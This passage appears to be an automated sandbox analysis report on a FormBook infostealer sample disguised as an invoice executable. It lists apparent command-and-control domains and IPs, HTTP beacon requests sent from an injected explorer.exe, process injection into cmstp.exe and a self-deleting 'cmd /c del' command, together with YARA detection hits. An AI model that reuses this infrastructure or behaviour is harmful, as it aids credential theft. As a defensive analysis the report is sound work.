                        .text0x20000xcc8740xcca00False0.600356263363data7.07298793214IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rsrc0xd00000x5b80x600False0.423828125data4.11165027332IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0xd20000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_VERSION0xd00a00x32cdata
                        RT_MANIFEST0xd03cc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Version Infos

                        DescriptionData
                        Translation0x0000 0x04b0
                        LegalCopyrightCopyright 2017
                        Assembly Version1.0.0.0
                        InternalNameCXGHo0w.exe
                        FileVersion1.0.0.0
                        CompanyName
                        LegalTrademarks
                        Comments
                        ProductNameBallistic Game
                        ProductVersion1.0.0.0
                        FileDescriptionBallistic Game
                        OriginalFilenameCXGHo0w.exe

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        10/13/21-18:23:11.004606ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                        10/13/21-18:23:12.994789ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 13, 2021 18:22:42.307439089 CEST4977880192.168.2.451.161.86.13
                        Oct 13, 2021 18:22:42.409260988 CEST804977851.161.86.13192.168.2.4
                        Oct 13, 2021 18:22:42.409439087 CEST4977880192.168.2.451.161.86.13
                        Oct 13, 2021 18:22:42.409841061 CEST4977880192.168.2.451.161.86.13
                        Oct 13, 2021 18:22:42.554083109 CEST804977851.161.86.13192.168.2.4
                        Oct 13, 2021 18:22:42.909389019 CEST4977880192.168.2.451.161.86.13
                        Oct 13, 2021 18:22:42.997302055 CEST804977851.161.86.13192.168.2.4
                        Oct 13, 2021 18:22:42.997476101 CEST4977880192.168.2.451.161.86.13
                        Oct 13, 2021 18:22:43.011189938 CEST804977851.161.86.13192.168.2.4
                        Oct 13, 2021 18:22:43.011415958 CEST4977880192.168.2.451.161.86.13
                        Oct 13, 2021 18:22:58.645088911 CEST4978080192.168.2.4209.17.116.165
                        Oct 13, 2021 18:22:58.774971962 CEST8049780209.17.116.165192.168.2.4
                        Oct 13, 2021 18:22:58.775136948 CEST4978080192.168.2.4209.17.116.165
                        Oct 13, 2021 18:22:58.775289059 CEST4978080192.168.2.4209.17.116.165
                        Oct 13, 2021 18:22:58.906469107 CEST8049780209.17.116.165192.168.2.4
                        Oct 13, 2021 18:22:58.906518936 CEST8049780209.17.116.165192.168.2.4
                        Oct 13, 2021 18:22:58.906800985 CEST4978080192.168.2.4209.17.116.165
                        Oct 13, 2021 18:22:58.906903982 CEST4978080192.168.2.4209.17.116.165
                        Oct 13, 2021 18:22:59.037889957 CEST8049780209.17.116.165192.168.2.4

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 13, 2021 18:22:42.179533958 CEST5172653192.168.2.48.8.8.8
                        Oct 13, 2021 18:22:42.301482916 CEST53517268.8.8.8192.168.2.4
                        Oct 13, 2021 18:22:48.022957087 CEST5679453192.168.2.48.8.8.8
                        Oct 13, 2021 18:22:48.464329004 CEST53567948.8.8.8192.168.2.4
                        Oct 13, 2021 18:22:58.514669895 CEST5653453192.168.2.48.8.8.8
                        Oct 13, 2021 18:22:58.641601086 CEST53565348.8.8.8192.168.2.4
                        Oct 13, 2021 18:23:03.918273926 CEST5662753192.168.2.48.8.8.8
                        Oct 13, 2021 18:23:04.926768064 CEST5662753192.168.2.48.8.8.8
                        Oct 13, 2021 18:23:05.927041054 CEST5662753192.168.2.48.8.8.8
                        Oct 13, 2021 18:23:07.974427938 CEST5662753192.168.2.48.8.8.8
                        Oct 13, 2021 18:23:09.945480108 CEST53566278.8.8.8192.168.2.4
                        Oct 13, 2021 18:23:11.003954887 CEST53566278.8.8.8192.168.2.4
                        Oct 13, 2021 18:23:12.994712114 CEST53566278.8.8.8192.168.2.4
                        Oct 13, 2021 18:23:14.961127996 CEST5662153192.168.2.48.8.8.8
                        Oct 13, 2021 18:23:15.974524021 CEST5662153192.168.2.48.8.8.8
                        Oct 13, 2021 18:23:16.007596970 CEST53566218.8.8.8192.168.2.4
                        Oct 13, 2021 18:23:21.774266958 CEST6311653192.168.2.48.8.8.8

                        ICMP Packets

                        TimestampSource IPDest IPChecksumCodeType
                        Oct 13, 2021 18:23:11.004606009 CEST192.168.2.48.8.8.8cfff(Port unreachable)Destination Unreachable
                        Oct 13, 2021 18:23:12.994788885 CEST192.168.2.48.8.8.8cfff(Port unreachable)Destination Unreachable

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Oct 13, 2021 18:22:42.179533958 CEST192.168.2.48.8.8.80xefe7Standard query (0)www.ratqueen.artA (IP address)IN (0x0001)
                        Oct 13, 2021 18:22:48.022957087 CEST192.168.2.48.8.8.80x41b0Standard query (0)www.yuezhong66.comA (IP address)IN (0x0001)
                        Oct 13, 2021 18:22:58.514669895 CEST192.168.2.48.8.8.80xe3a2Standard query (0)www.piedmontpines.schoolA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:03.918273926 CEST192.168.2.48.8.8.80xfb4eStandard query (0)www.kalitelihavaperdesi.comA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:04.926768064 CEST192.168.2.48.8.8.80xfb4eStandard query (0)www.kalitelihavaperdesi.comA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:05.927041054 CEST192.168.2.48.8.8.80xfb4eStandard query (0)www.kalitelihavaperdesi.comA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:07.974427938 CEST192.168.2.48.8.8.80xfb4eStandard query (0)www.kalitelihavaperdesi.comA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:14.961127996 CEST192.168.2.48.8.8.80xc03fStandard query (0)www.zoipartner.comA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:15.974524021 CEST192.168.2.48.8.8.80xc03fStandard query (0)www.zoipartner.comA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:21.774266958 CEST192.168.2.48.8.8.80x27f8Standard query (0)www.sosibibyslot.spaceA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Oct 13, 2021 18:22:42.301482916 CEST8.8.8.8192.168.2.40xefe7No error (0)www.ratqueen.artratqueen.artCNAME (Canonical name)IN (0x0001)
                        Oct 13, 2021 18:22:42.301482916 CEST8.8.8.8192.168.2.40xefe7No error (0)ratqueen.art51.161.86.13A (IP address)IN (0x0001)
                        Oct 13, 2021 18:22:48.464329004 CEST8.8.8.8192.168.2.40x41b0Name error (3)www.yuezhong66.comnonenoneA (IP address)IN (0x0001)
                        Oct 13, 2021 18:22:58.641601086 CEST8.8.8.8192.168.2.40xe3a2No error (0)www.piedmontpines.school209.17.116.165A (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:09.945480108 CEST8.8.8.8192.168.2.40xfb4eServer failure (2)www.kalitelihavaperdesi.comnonenoneA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:11.003954887 CEST8.8.8.8192.168.2.40xfb4eServer failure (2)www.kalitelihavaperdesi.comnonenoneA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:12.994712114 CEST8.8.8.8192.168.2.40xfb4eServer failure (2)www.kalitelihavaperdesi.comnonenoneA (IP address)IN (0x0001)
                        Oct 13, 2021 18:23:16.007596970 CEST8.8.8.8192.168.2.40xc03fName error (3)www.zoipartner.comnonenoneA (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • www.ratqueen.art
                        • www.piedmontpines.school

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.44977851.161.86.1380C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Oct 13, 2021 18:22:42.409841061 CEST5301OUTGET /mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa HTTP/1.1
                        Host: www.ratqueen.art
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Oct 13, 2021 18:22:42.997302055 CEST5302INHTTP/1.1 301 Moved Permanently
                        Server: nginx
                        Date: Wed, 13 Oct 2021 16:22:42 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        X-Frame-Options:
                        X-XSS-Protection: 1; mode=block
                        X-Content-Type-Options: nosniff
                        AS_SERVED_STATIC: false
                        Location: https://www.ratqueen.art/mqi9?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa
                        Cache-Control: no-cache
                        X-Request-Id: dc568a08-0ef3-468e-b148-cc198a1a6325
                        X-Runtime: 0.408293
                        Data Raw: 63 30 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 61 74 71 75 65 65 6e 2e 61 72 74 2f 6d 71 69 39 3f 34 68 65 44 3d 2d 5a 67 38 62 6a 76 38 42 4a 78 34 48 42 77 26 61 6d 70 3b 7a 30 3d 69 76 38 41 67 34 62 45 4a 75 49 69 6e 54 52 5a 30 6f 32 33 76 6f 67 67 52 74 50 77 71 74 51 2f 79 64 46 36 30 79 2b 53 2b 41 4a 50 30 5a 32 67 45 64 49 7a 57 31 67 55 31 68 35 59 4f 38 47 50 62 53 4c 61 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: c0<html><body>You are being <a href="https://www.ratqueen.art/mqi9?4heD=-Zg8bjv8BJx4HBw&amp;z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa">redirected</a>.</body></html>0


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.449780209.17.116.16580C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Oct 13, 2021 18:22:58.775289059 CEST5308OUTGET /mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw HTTP/1.1
                        Host: www.piedmontpines.school
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Oct 13, 2021 18:22:58.906469107 CEST5308INHTTP/1.1 400 Bad Request
                        Server: openresty/1.17.8.2
                        Date: Wed, 13 Oct 2021 16:22:58 GMT
                        Content-Type: text/html
                        Content-Length: 163
                        Connection: close
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


                        Code Manipulations

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Start time:18:21:08
                        Start date:13/10/2021
                        Path:C:\Users\user\Desktop\EXPORT INVOICE 2021.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
                        Imagebase:0x930000
                        File size:840704 bytes
                        MD5 hash:54BB8FBBFE0A665CA59579A0240CE2F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:low

                        General

                        Start time:18:21:36
                        Start date:13/10/2021
                        Path:C:\Users\user\Desktop\EXPORT INVOICE 2021.exe
                        Wow64 process (32bit):true
                        Commandline:{path}
                        Imagebase:0xa90000
                        File size:840704 bytes
                        MD5 hash:54BB8FBBFE0A665CA59579A0240CE2F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        General

                        Start time:18:21:38
                        Start date:13/10/2021
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff6fee60000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Start time:18:22:03
                        Start date:13/10/2021
                        Path:C:\Windows\SysWOW64\cmstp.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\cmstp.exe
                        Imagebase:0x350000
                        File size:82944 bytes
                        MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:moderate

                        General

                        Start time:18:22:08
                        Start date:13/10/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
                        Imagebase:0x11d0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:18:22:09
                        Start date:13/10/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff724c50000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Disassembly

                        Code Analysis

                        Reset < >